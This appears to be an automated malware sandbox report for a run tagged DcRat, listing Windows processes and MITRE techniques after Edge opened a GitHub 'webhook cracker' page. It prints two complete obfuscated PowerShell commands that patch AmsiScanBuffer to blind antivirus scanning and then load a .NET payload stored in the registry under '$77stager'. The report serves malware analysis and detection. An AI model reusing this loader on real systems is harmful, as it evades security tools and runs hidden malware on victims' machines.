PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2204	3120	msedge.exe	85
PID 3120 wrote to memory of 2952	3120	msedge.exe	86
PID 3120 wrote to memory of 2952	3120	msedge.exe	86
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87
PID 3120 wrote to memory of 208	3120	msedge.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4100	attrib.exe
724	attrib.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:384
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{70da4fb0-9883-4f68-b5dd-684386d862e8}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:908
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{74909919-d324-4e5b-856f-80c58d608c6a}
  2⤵
  PID:4496

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1180
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:lGXdBDrmXIKd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$gUWpeSUnNIxIto,[Parameter(Position=1)][Type]$FysciAdPHF)$XkCuLefPWMe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+'ct'+'e'+''+'d'+''+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+'M'+''+'e'+'mor'+'y'+''+[Char](77)+'od'+[Char](117)+'le',$False).DefineType(''+'M'+''+'y'+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+'y'+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'Pu'+[Char](98)+''+'l'+''+'i'+'c'+','+''+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d,'+[Char](65)+'ns'+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+'A'+'ut'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$XkCuLefPWMe.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+[Char](109)+'e,'+'H'+'i'+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+'P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$gUWpeSUnNIxIto).SetImplementationFlags(''+'R'+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+'e'+','+'M'+''+'a'+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');$XkCuLefPWMe.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'o'+'k'+'e',''+'P'+'ub'+[Char](108)+'ic'+','+'Hi'+[Char](100)+''+[Char](101)+'ByS'+[Char](105)+''+'g'+','+'N'+'ew'+[Char](83)+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$FysciAdPHF,$gUWpeSUnNIxIto).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+'d'+'');Write-Output $XkCuLefPWMe.CreateType();}$rMdEnZCvyoBDo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+'r'+''+[Char](111)+'so'+[Char](102)+''+'t'+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+[Char](51)+''+'2'+''+'.'+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+'N'+'a'+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+[Char](100)+'s');$IvEGERrkLiULac=$rMdEnZCvyoBDo.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+''+'c'+''+[Char](44)+''+'S'+''+'t'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$UiRTDErXBeiYlgQCSnk=lGXdBDrmXIKd @([String])([IntPtr]);$mfNRboFpFYIUXjPGWhrWyT=lGXdBDrmXIKd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ktKHjeQflwq=$rMdEnZCvyoBDo.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'Han'+[Char](100)+'le').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+'r'+'n'+'e'+'l'+'3'+''+[Char](50)+'.'+'d'+'l'+[Char](108)+'')));$wOikXNyjXDhnci=$IvEGERrkLiULac.Invoke($Null,@([Object]$ktKHjeQflwq,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$UswhRpNCxwEuCyQDX=$IvEGERrkLiULac.Invoke($Null,@([Object]$ktKHjeQflwq,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+'ect')));$oCcvuBf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wOikXNyjXDhnci,$UiRTDErXBeiYlgQCSnk).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'ll');$QuCyJWGqcTkpfrunX=$IvEGERrkLiULac.Invoke($Null,@([Object]$oCcvuBf,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+'c'+'a'+''+[Char](110)+''+'B'+''+'u'+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$PaEQQfLDLu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UswhRpNCxwEuCyQDX,$mfNRboFpFYIUXjPGWhrWyT).Invoke($QuCyJWGqcTkpfrunX,[uint32]8,4,[ref]$PaEQQfLDLu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$QuCyJWGqcTkpfrunX,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UswhRpNCxwEuCyQDX,$mfNRboFpFYIUXjPGWhrWyT).Invoke($QuCyJWGqcTkpfrunX,[uint32]8,0x20,[ref]$PaEQQfLDLu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'FT'+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+'77'+'s'+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1236
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mjudJGKXClZR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pQRLpAFPsmbzOr,[Parameter(Position=1)][Type]$lWrrWImNzU)$iQqfnAJPUYA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+[Char](101)+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+'u'+''+[Char](108)+'e',$False).DefineType('M'+'y'+'D'+'e'+''+[Char](108)+''+[Char](101)+'ga'+'t'+''+'e'+''+'T'+'yp'+[Char](101)+'','Cl'+[Char](97)+''+'s'+''+[Char](115)+''+','+'P'+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'e'+[Char](97)+'l'+'e'+''+[Char](100)+''+','+'A'+[Char](110)+''+'s'+''+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+'u'+''+'t'+'o'+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$iQqfnAJPUYA.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'ci'+[Char](97)+''+'l'+''+'N'+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+'Hid'+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$pQRLpAFPsmbzOr).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$iQqfnAJPUYA.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+'i'+'c'+','+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+'y'+'S'+''+'i'+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+'u'+[Char](97)+''+[Char](108)+'',$lWrrWImNzU,$pQRLpAFPsmbzOr).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+'im'+'e'+','+'M'+''+[Char](97)+''+'n'+'ag'+[Char](101)+''+[Char](100)+'');Write-Output $iQqfnAJPUYA.CreateType();}$DOHUafJLKCLEI=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+'n'+''+[Char](51)+''+'2'+'.'+'U'+'n'+'s'+''+'a'+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+'h'+''+[Char](111)+''+'d'+'s');$BHchXnannDHgBr=$DOHUafJLKCLEI.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mNEtmpyKlxwWYRhOZPL=mjudJGKXClZR @([String])([IntPtr]);$gUTenfynorkBeasqbXdaPK=mjudJGKXClZR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PEBAcAVMdiN=$DOHUafJLKCLEI.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](77)+'od'+[Char](117)+''+[Char](108)+''+'e'+''+'H'+''+'a'+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+'n'+'e'+[Char](108)+''+[Char](51)+''+'2'+'.d'+[Char](108)+''+[Char](108)+'')));$PlBNuTROuuLmhd=$BHchXnannDHgBr.Invoke($Null,@([Object]$PEBAcAVMdiN,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+'Li'+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$hDSnGpYgmtxEruRia=$BHchXnannDHgBr.Invoke($Null,@([Object]$PEBAcAVMdiN,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l'+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+''+[Char](116)+'')));$scZTBUO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PlBNuTROuuLmhd,$mNEtmpyKlxwWYRhOZPL).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+'dl'+[Char](108)+'');$KVcCVEiBLlsCOVznL=$BHchXnannDHgBr.Invoke($Null,@([Object]$scZTBUO,[Object](''+[Char](65)+''+'m'+''+'s'+'i'+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+'uf'+'f'+'e'+[Char](114)+'')));$QLsPSJHOmm=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hDSnGpYgmtxEruRia,$gUTenfynorkBeasqbXdaPK).Invoke($KVcCVEiBLlsCOVznL,[uint32]8,4,[ref]$QLsPSJHOmm);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$KVcCVEiBLlsCOVznL,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hDSnGpYgmtxEruRia,$gUTenfynorkBeasqbXdaPK).Invoke($KVcCVEiBLlsCOVznL,[uint32]8,0x20,[ref]$QLsPSJHOmm);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+'T'+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+''+[Char](55)+'s'+[Char](116)+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4488
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:4188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1308

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1440
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1804

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1976

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2168

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2212

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2556

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2832

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2940

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2996

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:3012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:3032

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/Sindoes/App-webhook-Cracker
  2⤵
  - DcRat
  - Enumerates system info in registry
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3120
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffa146646f8,0x7ffa14664708,0x7ffa14664718
    3⤵
    PID:212
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
    3⤵
    PID:2204
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2952
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2528 /prefetch:8
    3⤵
    PID:208
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
    3⤵
    PID:2872
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
    3⤵
    PID:1920
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
    3⤵
    PID:5088
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3096
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5824 /prefetch:8
    3⤵
    PID:3960
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,3728581671124683,14932075850195267547,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
    3⤵
    PID:4024
